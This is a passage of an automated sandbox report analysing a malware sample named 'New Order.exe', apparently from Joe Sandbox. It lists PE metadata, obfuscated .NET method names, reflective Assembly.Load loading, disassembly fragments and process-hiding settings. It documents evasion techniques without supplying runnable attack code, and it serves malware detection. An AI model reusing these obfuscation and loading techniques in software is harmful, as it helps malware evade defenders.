                Source: New Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: New Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: w32tm.pdb source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XVZmwHdSYwx.exe, 0000000D.00000002.4632680489.000000000075E000.00000002.00000001.01000000.0000000C.sdmp, XVZmwHdSYwx.exe, 00000011.00000002.4628553874.000000000075E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: New Order.exe, New Order.exe, 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, w32tm.exe, 0000000E.00000003.2484890220.0000000003007000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000003.2491039290.00000000031BB000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: w32tm.pdbGCTL source: New Order.exe, 00000008.00000002.2488836600.0000000001367000.00000004.00000020.00020000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000002.4633149087.0000000000928000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.cs.Net Code: WmEujLLlvB System.Reflection.Assembly.Load(byte[])
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.cs.Net Code: WmEujLLlvB System.Reflection.Assembly.Load(byte[])
                Source: 1.2.New Order.exe.59b0000.3.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_02D9EE60 push esp; iretd 1_2_02D9EE61
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_060BF8DC pushad ; iretd 1_2_060BF8DD
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A8EF3 push edi; ret 1_2_074A8EFB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 1_2_074A05C8 pushfd ; retf 1_2_074A05D5
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040C0BE push esi; iretd 8_2_0040C0BF
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00403150 push eax; ret 8_2_00403152
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004071C5 push 064DD826h; ret 8_2_00407218
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004151E5 push ebp; retf 8_2_004151E6
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040719F push 064DD826h; ret 8_2_00407218
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040721A push 064DD826h; ret 8_2_00407218
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_0040DB92 pushfd ; retf 8_2_0040DB95
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_00418C64 push ebx; iretd 8_2_00418CBB
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_004185B8 push ecx; iretd 8_2_004185B9
                Source: C:\Users\user\Desktop\New Order.exeCode function: 8_2_018009AD push ecx; mov dword ptr [esp], ecx8_2_018009B6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_033A09AD push ecx; mov dword ptr [esp], ecx14_2_033A09B6
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00962092 push ebp; retf 14_2_00962093
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009720AD push esp; retf 14_2_009720BF
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009540C7 push 064DD826h; ret 14_2_009540C5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0095404C push 064DD826h; ret 14_2_009540C5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00954072 push 064DD826h; ret 14_2_009540C5
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00958F6B push esi; iretd 14_2_00958F6C
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009715CE push BF7A2FD7h; iretd 14_2_009715DE
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_009715EF push BF7A2FD7h; iretd 14_2_009715DE
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_00965B11 push ebx; iretd 14_2_00965B68
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D368 push C843D3C6h; retf 14_2_0328D373
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D2E0 pushad ; iretd 14_2_0328D2E1
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_032861BE push edx; ret 14_2_032861C9
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328D711 push cs; iretd 14_2_0328D712
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328F582 push esi; iretd 14_2_0328F653
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328F5FE push esi; iretd 14_2_0328F653
                Source: C:\Windows\SysWOW64\w32tm.exeCode function: 14_2_0328BB3B pushfd ; retf 14_2_0328BB1C
                Source: New Order.exeStatic PE information: section name: .text entropy: 7.814379411138541
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, XcFZQ5Wb4jiCmTJ1Nt.csHigh entropy of concatenated method names: 'uKsk4lQj3M', 'PeEkV3mXtX', 'pDwkYm4cHs', 'd5XYTDMMNi', 'GOEYzBWdvf', 'ebckO2rNEn', 'h3YkHQxait', 'qTNk2y22RS', 'C2mkxLdr3d', 'uJSkuB6wiP'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, kPwJ44nc3J1leqjaPO.csHigh entropy of concatenated method names: 'ylJSpnZueR', 'M4QSEUrE51', 'O5NSFKa8QW', 'wKNSim7WC0', 'p1RSyRBumo', 'zKsSCcswEO', 'gJKSWQtYZR', 'wUHSakDYcB', 'blJSUMQrSf', 'glvSoX3mV6'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, KXOu74t9GvIK3VBWFs.csHigh entropy of concatenated method names: 'ebUNmb8pH1', 'vdWNcxqhRR', 'C2MN06w06o', 'sONNKa9xC0', 'MumN1RLuq7', 'B4wN9gbtus', 'n1YNfRCirg', 'z4FN38kRlg', 'rBdNnZTd2h', 'zUZNT0gIa2'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, ucqiXrfx0Syni9p3OA.csHigh entropy of concatenated method names: 'xj7SIwEh7I', 'KP2ShtRn4I', 'f4ZSSjPUSM', 'BJWSXZVnYw', 'IxTS6LZAxg', 'cjMSP2ecGi', 'Dispose', 'Tqxr4Js272', 'LLwrN3I7Lk', 'hArrVMTLSc'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, ELY8UFH2PglgVjiHZY1.csHigh entropy of concatenated method names: 'ToString', 'jnhXtDudCg', 'I4wXBDLb8M', 'HhiXAQpvc6', 'xeMXpiLoB9', 'QpCXEfT7x1', 'lHyXFrV2hL', 'Tt9XiInX9H', 'PvFZ8XCUG71xwiyTyqJ', 'RZ8kZxCNoqfWpbPjWcW'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, efPLxH2TqBFckGjeSR.csHigh entropy of concatenated method names: 'hUUjah354', 'ecBQtjfDm', 'y3X7DK13R', 'nQ9GGCR5b', 'j1BB5JGSI', 'rsqA3MZua', 'kxqeAEb2blXEJDHTwn', 'yqkwC2xDDjfTh94FQR', 'aelrb7V6l', 'Gu0woRAII'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, UUoQ7m0jItuerthGfx.csHigh entropy of concatenated method names: 'ToString', 'C5O8L2Hp2H', 'Dfl8EbqgT8', 'Ydb8FcsssY', 'G968iYUPIt', 'ipa8y8Tgvd', 'EBL8Cl7oxj', 'lIh8WB6NbS', 'j1h8aRJG3R', 'rZY8Uq6HpI'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, oGZrgJB7JtgxmQBWKY.csHigh entropy of concatenated method names: 'ykLVQG22Pg', 'nt9V7bmWNJ', 'YMSVt3N64c', 'NwwVBax4H4', 'rOhVID4MqP', 'Y1WV8wo0pT', 'g98VhqAH4Y', 'WXLVruVNWI', 'VehVSGF8tw', 'lhWVwh3ElO'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, vWyMUjUEPh6pAHEOAY.csHigh entropy of concatenated method names: 'lOHkJhkWgc', 'KY5kM01ErO', 'u3EkjBj6v2', 'DupkQgRTLm', 'r7Mk5L9tQT', 'yZpk701eYt', 'tGOkGbLqC3', 'jJxktS56aJ', 'i37kBTfiDF', 'efikAOXMk1'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, X1i88aq7m6arQ2ji8w.csHigh entropy of concatenated method names: 'WyndtMyewX', 'QPwdBroYYI', 'IFVdpyPsBt', 'HUCdEQiAi4', 'BsadiAASNa', 'M3NdyXgpDy', 'wo7dWlkd2i', 'IbLdaTjDiw', 'lmBdoEkF7B', 'w8WdLL4Gbo'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, FdaFyJu2nRBL1qwfYH.csHigh entropy of concatenated method names: 'm7WHkXOu74', 'VGvHDIK3VB', 'x7JHvtgxmQ', 'EWKHRYOGe2', 'PCaHIj7Lxo', 'ATfH87PnUC', 'eT3T49Us6xvfcvl6eq', 'KX0pwfNJkxsGqaWkIP', 'w6qHHO4etQ', 'bMFHxISJTa'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M7cDBeDIldQIV71LRd.csHigh entropy of concatenated method names: 'VOlxb272id', 'QLyx4EBed4', 'oSTxN5Bl5L', 'JFOxVktjxy', 'rELxlu9UKP', 'DgCxYlxHbe', 'QWixkNyQa1', 'etQxDXP2Ic', 'AB8xsW5q9M', 'OK0xvyKVlQ'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, DAoITCHHL9yAmQEF0Sb.csHigh entropy of concatenated method names: 'nocwT9wKa6', 'vTcwzcMrxj', 'CVTXOIIkbG', 'noPXHVs3je', 'PD7X2OIQ6D', 'rJdXx6JrsS', 'lFnXuaP9A6', 'xd0XbQ1PJP', 'VgyX4oqfQJ', 'U5eXNkXGXj'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, M8cPLRTsQ9BrfNo7Xb.csHigh entropy of concatenated method names: 'fdgwVvbVGU', 'dakwlfWNHp', 'c1JwY9gM3r', 'oalwk1hbMF', 'svcwSDoUKL', 'MQkwDUdCom', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, qSVPwRK1hd7HZJZpIU.csHigh entropy of concatenated method names: 'I4WhvCmcJj', 'PoxhRNawhm', 'ToString', 'P3Wh46aOhn', 'KAAhN72uFU', 'rHohVPVad0', 'G1HhlhVM1e', 'IGphYDJaZe', 'VnahkUdGG9', 'Y56hDosrCL'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, CuT4rCHueTPBYquwsAX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCrgSmbY1w', 'AyugwcFWUf', 'L6DgX20SCa', 'JDXggNyeNZ', 'WbLg63XRDe', 'ym2geI7WYr', 'kQ2gPUpetr'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, AQkNgb9hTCZmeIj6A0.csHigh entropy of concatenated method names: 'dGZh3Ek89C', 'tvOhTk3COq', 'GfjrOVcJKc', 'ONtrH3WI4D', 'udZhLobbUd', 'iohhZ8J9pt', 'e0ChqgEe3D', 'wRFhmnxuLF', 'kN4hcmG6Q7', 'LaEh0QEu70'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, ODjTiQNTVBNJuwqxEj.csHigh entropy of concatenated method names: 'Dispose', 'rynHni9p3O', 'Ejt2EuRWdE', 'vqOg1SwkWY', 'FbVHT47TG2', 'inEHz45vmG', 'ProcessDialogKey', 'wPD2OPwJ44', 'R3J2H1leqj', 'LPO22U8cPL'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, OxoQTfp7PnUCwN14no.csHigh entropy of concatenated method names: 'QCAYbCe3md', 'ftZYNHEy0p', 'OanYle6ZnM', 'Yv5YkUS4BK', 'vHkYDMvbAh', 'b2Il116Q71', 'y1yl9gBvpE', 'QB0lfJstp7', 'd7el3axQ8C', 'df1lnKpJXZ'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, POu82VzOwjvaboP5Q9.csHigh entropy of concatenated method names: 'pv0w74oaSx', 'Vtwwtj9MqT', 'CbSwB2RIrk', 'he3wpwbTfB', 'GWDwEpx03a', 'iIBwiAv03l', 'rr9wyJUB93', 'lyHwPncare', 'UgowJUM4fS', 'idswMssxgI'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, oBUAdVV1wigcc8Q33F.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZO2nWwvkR', 'i9Q2TsPfqy', 'RvM2zLPufV', 'BBpxO41WLf', 'vDixHM9Jkc', 'hiMx2tANAp', 'vWCxxjyohf', 'N8TIZlXr5uAiiIDvmEQ'
                Source: 1.2.New Order.exe.4006340.0.raw.unpack, F57NpumPsJJ6L4hEiw.csHigh entropy of concatenated method names: 'g0MIoT50Ia', 'QvHIZn6G1R', 'NdqImQij9L', 'xkPIcwoimd', 'LtSIEVv2Fk', 'hISIF5mr5b', 'U6cIiQRsRf', 'zDwIycV0Jj', 'omPICf6ABA', 'H2vIWrVTd2'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, XcFZQ5Wb4jiCmTJ1Nt.csHigh entropy of concatenated method names: 'uKsk4lQj3M', 'PeEkV3mXtX', 'pDwkYm4cHs', 'd5XYTDMMNi', 'GOEYzBWdvf', 'ebckO2rNEn', 'h3YkHQxait', 'qTNk2y22RS', 'C2mkxLdr3d', 'uJSkuB6wiP'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, kPwJ44nc3J1leqjaPO.csHigh entropy of concatenated method names: 'ylJSpnZueR', 'M4QSEUrE51', 'O5NSFKa8QW', 'wKNSim7WC0', 'p1RSyRBumo', 'zKsSCcswEO', 'gJKSWQtYZR', 'wUHSakDYcB', 'blJSUMQrSf', 'glvSoX3mV6'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, KXOu74t9GvIK3VBWFs.csHigh entropy of concatenated method names: 'ebUNmb8pH1', 'vdWNcxqhRR', 'C2MN06w06o', 'sONNKa9xC0', 'MumN1RLuq7', 'B4wN9gbtus', 'n1YNfRCirg', 'z4FN38kRlg', 'rBdNnZTd2h', 'zUZNT0gIa2'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, ucqiXrfx0Syni9p3OA.csHigh entropy of concatenated method names: 'xj7SIwEh7I', 'KP2ShtRn4I', 'f4ZSSjPUSM', 'BJWSXZVnYw', 'IxTS6LZAxg', 'cjMSP2ecGi', 'Dispose', 'Tqxr4Js272', 'LLwrN3I7Lk', 'hArrVMTLSc'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, ELY8UFH2PglgVjiHZY1.csHigh entropy of concatenated method names: 'ToString', 'jnhXtDudCg', 'I4wXBDLb8M', 'HhiXAQpvc6', 'xeMXpiLoB9', 'QpCXEfT7x1', 'lHyXFrV2hL', 'Tt9XiInX9H', 'PvFZ8XCUG71xwiyTyqJ', 'RZ8kZxCNoqfWpbPjWcW'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, efPLxH2TqBFckGjeSR.csHigh entropy of concatenated method names: 'hUUjah354', 'ecBQtjfDm', 'y3X7DK13R', 'nQ9GGCR5b', 'j1BB5JGSI', 'rsqA3MZua', 'kxqeAEb2blXEJDHTwn', 'yqkwC2xDDjfTh94FQR', 'aelrb7V6l', 'Gu0woRAII'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, UUoQ7m0jItuerthGfx.csHigh entropy of concatenated method names: 'ToString', 'C5O8L2Hp2H', 'Dfl8EbqgT8', 'Ydb8FcsssY', 'G968iYUPIt', 'ipa8y8Tgvd', 'EBL8Cl7oxj', 'lIh8WB6NbS', 'j1h8aRJG3R', 'rZY8Uq6HpI'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, oGZrgJB7JtgxmQBWKY.csHigh entropy of concatenated method names: 'ykLVQG22Pg', 'nt9V7bmWNJ', 'YMSVt3N64c', 'NwwVBax4H4', 'rOhVID4MqP', 'Y1WV8wo0pT', 'g98VhqAH4Y', 'WXLVruVNWI', 'VehVSGF8tw', 'lhWVwh3ElO'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, vWyMUjUEPh6pAHEOAY.csHigh entropy of concatenated method names: 'lOHkJhkWgc', 'KY5kM01ErO', 'u3EkjBj6v2', 'DupkQgRTLm', 'r7Mk5L9tQT', 'yZpk701eYt', 'tGOkGbLqC3', 'jJxktS56aJ', 'i37kBTfiDF', 'efikAOXMk1'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, X1i88aq7m6arQ2ji8w.csHigh entropy of concatenated method names: 'WyndtMyewX', 'QPwdBroYYI', 'IFVdpyPsBt', 'HUCdEQiAi4', 'BsadiAASNa', 'M3NdyXgpDy', 'wo7dWlkd2i', 'IbLdaTjDiw', 'lmBdoEkF7B', 'w8WdLL4Gbo'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, FdaFyJu2nRBL1qwfYH.csHigh entropy of concatenated method names: 'm7WHkXOu74', 'VGvHDIK3VB', 'x7JHvtgxmQ', 'EWKHRYOGe2', 'PCaHIj7Lxo', 'ATfH87PnUC', 'eT3T49Us6xvfcvl6eq', 'KX0pwfNJkxsGqaWkIP', 'w6qHHO4etQ', 'bMFHxISJTa'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M7cDBeDIldQIV71LRd.csHigh entropy of concatenated method names: 'VOlxb272id', 'QLyx4EBed4', 'oSTxN5Bl5L', 'JFOxVktjxy', 'rELxlu9UKP', 'DgCxYlxHbe', 'QWixkNyQa1', 'etQxDXP2Ic', 'AB8xsW5q9M', 'OK0xvyKVlQ'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, DAoITCHHL9yAmQEF0Sb.csHigh entropy of concatenated method names: 'nocwT9wKa6', 'vTcwzcMrxj', 'CVTXOIIkbG', 'noPXHVs3je', 'PD7X2OIQ6D', 'rJdXx6JrsS', 'lFnXuaP9A6', 'xd0XbQ1PJP', 'VgyX4oqfQJ', 'U5eXNkXGXj'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, M8cPLRTsQ9BrfNo7Xb.csHigh entropy of concatenated method names: 'fdgwVvbVGU', 'dakwlfWNHp', 'c1JwY9gM3r', 'oalwk1hbMF', 'svcwSDoUKL', 'MQkwDUdCom', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, qSVPwRK1hd7HZJZpIU.csHigh entropy of concatenated method names: 'I4WhvCmcJj', 'PoxhRNawhm', 'ToString', 'P3Wh46aOhn', 'KAAhN72uFU', 'rHohVPVad0', 'G1HhlhVM1e', 'IGphYDJaZe', 'VnahkUdGG9', 'Y56hDosrCL'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, CuT4rCHueTPBYquwsAX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GCrgSmbY1w', 'AyugwcFWUf', 'L6DgX20SCa', 'JDXggNyeNZ', 'WbLg63XRDe', 'ym2geI7WYr', 'kQ2gPUpetr'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, AQkNgb9hTCZmeIj6A0.csHigh entropy of concatenated method names: 'dGZh3Ek89C', 'tvOhTk3COq', 'GfjrOVcJKc', 'ONtrH3WI4D', 'udZhLobbUd', 'iohhZ8J9pt', 'e0ChqgEe3D', 'wRFhmnxuLF', 'kN4hcmG6Q7', 'LaEh0QEu70'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, ODjTiQNTVBNJuwqxEj.csHigh entropy of concatenated method names: 'Dispose', 'rynHni9p3O', 'Ejt2EuRWdE', 'vqOg1SwkWY', 'FbVHT47TG2', 'inEHz45vmG', 'ProcessDialogKey', 'wPD2OPwJ44', 'R3J2H1leqj', 'LPO22U8cPL'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, OxoQTfp7PnUCwN14no.csHigh entropy of concatenated method names: 'QCAYbCe3md', 'ftZYNHEy0p', 'OanYle6ZnM', 'Yv5YkUS4BK', 'vHkYDMvbAh', 'b2Il116Q71', 'y1yl9gBvpE', 'QB0lfJstp7', 'd7el3axQ8C', 'df1lnKpJXZ'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, POu82VzOwjvaboP5Q9.csHigh entropy of concatenated method names: 'pv0w74oaSx', 'Vtwwtj9MqT', 'CbSwB2RIrk', 'he3wpwbTfB', 'GWDwEpx03a', 'iIBwiAv03l', 'rr9wyJUB93', 'lyHwPncare', 'UgowJUM4fS', 'idswMssxgI'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, oBUAdVV1wigcc8Q33F.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZO2nWwvkR', 'i9Q2TsPfqy', 'RvM2zLPufV', 'BBpxO41WLf', 'vDixHM9Jkc', 'hiMx2tANAp', 'vWCxxjyohf', 'N8TIZlXr5uAiiIDvmEQ'
                Source: 1.2.New Order.exe.7400000.4.raw.unpack, F57NpumPsJJ6L4hEiw.csHigh entropy of concatenated method names: 'g0MIoT50Ia', 'QvHIZn6G1R', 'NdqImQij9L', 'xkPIcwoimd', 'LtSIEVv2Fk', 'hISIF5mr5b', 'U6cIiQRsRf', 'zDwIycV0Jj', 'omPICf6ABA', 'H2vIWrVTd2'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
